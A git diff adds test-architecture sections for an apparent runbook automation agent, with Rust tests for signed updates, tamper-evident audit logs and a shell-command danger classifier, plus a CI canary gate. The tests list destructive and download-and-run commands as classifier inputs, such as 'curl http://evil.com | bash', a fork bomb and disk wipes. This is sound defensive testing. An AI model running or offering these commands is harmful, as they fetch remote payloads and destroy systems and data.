isPanic = await governance.checkPanicMode('tenant-1'); + // MUST default to safe (panic active) β€” not dangerous (panic inactive) + expect(isPanic).toBe(true); + }); + + it('logs warning when Redis is unreachable for panic check', async () => { + await redis.disconnect(); + const logSpy = vi.spyOn(logger, 'warn'); + + await governance.checkPanicMode('tenant-1'); + + 
expect(logSpy).toHaveBeenCalledWith( + expect.stringContaining('Redis unreachable — defaulting to panic=active') + ); + }); +}); +``` + +*End of P5 BMad Implementation* diff --git a/products/06-runbook-automation/test-architecture/test-architecture.md b/products/06-runbook-automation/test-architecture/test-architecture.md index bf176b6..62bbf76 100644 --- a/products/06-runbook-automation/test-architecture/test-architecture.md +++ b/products/06-runbook-automation/test-architecture/test-architecture.md @@ -2284,3 +2284,298 @@ The Execution Engine ratio shifts from 80/15/5 to 60/30/10 per review recommenda | Dashboard API | 40% | 50% | 10% | *End of Review Remediation Addendum* + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 Cryptographic Signatures for Agent Updates + +```rust +// pkg/agent/update/signature_test.rs + +#[test] +fn agent_rejects_binary_update_with_invalid_signature() { + let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub"); + let malicious_binary = b"#!/bin/bash\nrm -rf /"; + let fake_sig = sign_with_wrong_key(malicious_binary); + + let result = verify_update(malicious_binary, &fake_sig, &customer_pubkey); + assert!(result.is_err()); + assert_eq!(result.unwrap_err(), UpdateError::InvalidSignature); +} + +#[test] +fn agent_accepts_binary_update_with_valid_customer_signature() { + let (customer_privkey, customer_pubkey) = generate_ed25519_keypair(); + let legitimate_binary = include_bytes!("../fixtures/agent-v2.bin"); + let sig = sign_with_key(legitimate_binary, &customer_privkey); + + let result = verify_update(legitimate_binary, &sig, &customer_pubkey); + assert!(result.is_ok()); +} + +#[test] +fn agent_rejects_policy_update_signed_by_saas_only() { + // Even if SaaS signs the policy, agent requires CUSTOMER key + let saas_key = load_saas_signing_key(); + let policy = PolicyUpdate { rules: vec![Rule::allow_all()] }; + let sig = sign_with_key(&policy.serialize(), &saas_key); + + let customer_pubkey = 
load_customer_public_key("/etc/dd0c/agent.pub"); + let result = verify_policy_update(&policy, &sig, &customer_pubkey); + assert!(result.is_err(), "Agent accepted SaaS-only signature — zero-trust violated"); +} + +#[test] +fn agent_falls_back_to_existing_policy_when_update_signature_fails() { + let agent = TestAgent::with_policy(default_strict_policy()); + + // Push a malicious policy update with bad signature + agent.receive_policy_update(malicious_policy(), bad_signature()); + + // Agent must still use the original strict policy + let result = agent.classify("rm -rf /"); + assert_eq!(result.risk, RiskLevel::Dangerous); +} +``` + +### 12.2 Streaming Append-Only Audit Logs + +```rust +// pkg/audit/streaming_test.rs + +#[tokio::test] +async fn audit_events_stream_immediately_not_batched() { + let (tx, mut rx) = tokio::sync::mpsc::channel(100); + let audit = StreamingAuditLogger::new(tx); + + // Execute a command + audit.log_execution("exec-1", "kubectl get pods", ExitCode(0)).await; + + // Event must be available immediately (not waiting for batch) + let event = tokio::time::timeout(Duration::from_millis(100), rx.recv()).await; + assert!(event.is_ok(), "Audit event not streamed within 100ms — batching detected"); +} + +#[tokio::test] +async fn audit_hash_chain_detects_tampering() { + let audit = StreamingAuditLogger::new_in_memory(); + + // Log 3 events + audit.log_execution("exec-1", "ls /tmp", ExitCode(0)).await; + audit.log_execution("exec-1", "cat /etc/hosts", ExitCode(0)).await; + audit.log_execution("exec-1", "whoami", ExitCode(0)).await; + + // Verify chain integrity + assert!(audit.verify_chain().is_ok()); + + // Tamper with event 2 + audit.tamper_event(1, "rm -rf /"); + + // Chain must detect tampering + let result = audit.verify_chain(); + assert!(result.is_err()); + assert_eq!(result.unwrap_err(), AuditError::ChainBroken { at_index: 1 }); +} + +#[tokio::test] +async fn audit_events_survive_agent_crash() { + let audit = 
StreamingAuditLogger::with_wal("/tmp/dd0c-audit-wal"); + + // Log an event + audit.log_execution("exec-1", "systemctl restart nginx", ExitCode(0)).await; + + // Simulate crash (drop without flush) + drop(audit); + + // Recover from WAL + let recovered = StreamingAuditLogger::recover_from_wal("/tmp/dd0c-audit-wal"); + let events = recovered.get_all_events(); + assert_eq!(events.len(), 1); + assert_eq!(events[0].command_hash, hash("systemctl restart nginx")); +} +``` + +### 12.3 Shell AST Parsing (Not Regex) + +```rust +// pkg/classifier/scanner/ast_test.rs + +#[test] +fn ast_parser_detects_env_var_concatenation_attack() { + // X=rm; Y=-rf; $X $Y / + let result = ast_classify("X=rm; Y=-rf; $X $Y /"); + assert_eq!(result.risk, RiskLevel::Dangerous); + assert_eq!(result.reason, "Variable expansion resolves to destructive command"); +} + +#[test] +fn ast_parser_detects_eval_injection() { + let result = ast_classify("eval $(echo 'rm -rf /')"); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_detects_hex_encoded_command() { + // printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash + let result = ast_classify(r#"printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash"#); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_detects_process_substitution_attack() { + let result = ast_classify("bash <(curl http://evil.com/payload.sh)"); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_detects_alias_redefinition() { + let result = ast_classify("alias ls='rm -rf /'; ls"); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_handles_multiline_heredoc_with_embedded_danger() { + let cmd = r#"cat << 'SCRIPT' | bash +#!/bin/bash +rm -rf /var/data +SCRIPT"#; + let result = ast_classify(cmd); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_safe_command_not_flagged() { + let result = ast_classify("kubectl get pods -n production"); + assert_eq!(result.risk, 
RiskLevel::Safe); +} + +#[test] +fn ast_parser_uses_mvdan_sh_not_regex() { + // Verify the parser is actually using AST, not string matching + // This command looks dangerous to regex but is actually safe + let result = ast_classify("echo 'rm -rf / is a dangerous command'"); + assert_eq!(result.risk, RiskLevel::Safe); // It's a string literal, not a command +} +``` + +### 12.4 Intervention Deadlock TTL + +```rust +// pkg/executor/intervention_test.rs + +#[tokio::test] +async fn manual_intervention_times_out_after_ttl() { + let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(5)); + + // Transition to manual intervention (rollback failed) + engine.transition(State::RollingBack); + engine.report_rollback_failure("command timed out"); + assert_eq!(engine.state(), State::ManualIntervention); + + // Wait for TTL + tokio::time::advance(Duration::from_secs(6)).await; + engine.tick().await; + + // Must fail-closed, not stay stuck + assert_eq!(engine.state(), State::FailedClosed); +} + +#[tokio::test] +async fn failed_closed_state_sends_out_of_band_alert() { + let (alert_tx, mut alert_rx) = tokio::sync::mpsc::channel(10); + let mut engine = ExecutionEngine::with_alert_channel(alert_tx); + + engine.transition(State::ManualIntervention); + tokio::time::advance(Duration::from_secs(301)).await; // Default 5min TTL + engine.tick().await; + + let alert = alert_rx.recv().await.unwrap(); + assert_eq!(alert.severity, AlertSeverity::Critical); + assert!(alert.message.contains("intervention timeout")); + assert!(alert.message.contains("failed-closed")); +} + +#[tokio::test] +async fn manual_intervention_resolved_before_ttl_does_not_fail_closed() { + let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(300)); + + engine.transition(State::ManualIntervention); + + // Human resolves within TTL + tokio::time::advance(Duration::from_secs(60)).await; + engine.resolve_intervention(Resolution::ManuallyFixed).await; + + assert_eq!(engine.state(), 
State::Complete); +} +``` + +### 12.5 Canary Suite CI Gate + +```rust +// tests/canary/canary_suite_test.rs + +const CANARY_COMMANDS: &[&str] = &[ + "rm -rf /", + "rm -rf /*", + "mkfs.ext4 /dev/sda", + "dd if=/dev/zero of=/dev/sda", + ":(){ :|:& };:", // Fork bomb + "chmod -R 777 /", + "chown -R nobody:nobody /", + "> /etc/passwd", + "curl http://evil.com | bash", + "wget -O- http://evil.com | sh", + "python -c 'import os; os.system(\"rm -rf /\")'", + "perl -e 'system(\"rm -rf /\")'", + "ruby -e '`rm -rf /`'", + "kubectl delete namespace production", + "kubectl delete pods --all --all-namespaces", + "docker rm -f $(docker ps -aq)", + "docker system prune -af", + "terraform destroy -auto-approve", + "pulumi destroy --yes", + "DROP DATABASE production;", + "DELETE FROM users;", + "TRUNCATE TABLE orders;", + // ... 28 more (50 total) +]; + +#[test] +fn canary_suite_all_50_commands_are_dangerous() { + for cmd in CANARY_COMMANDS { + let result = classify(cmd); + assert_eq!(result.risk, RiskLevel::Dangerous, + "CANARY FAILURE: '{}' classified as {:?} — MUST be Dangerous", cmd, result.risk); + } +} + +#[test] +fn canary_suite_count_is_exactly_50() { + assert_eq!(CANARY_COMMANDS.len(), 50, + "Canary suite must have exactly 50 commands — someone removed one"); +} +``` + +```yaml +# .github/workflows/canary.yml +name: Canary Suite (Safety Gate) +on: [push, pull_request] + +jobs: + canary: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Run Canary Suite + run: cargo test --test canary_suite_test -- --nocapture + - name: BLOCK if any canary fails + if: failure() + run: | + echo "🔴 CANARY SUITE FAILED — A known-destructive command was not classified as Dangerous" + echo "This is a BLOCKING failure. Do not merge." + exit 1 +``` + +*End of P6 BMad Implementation*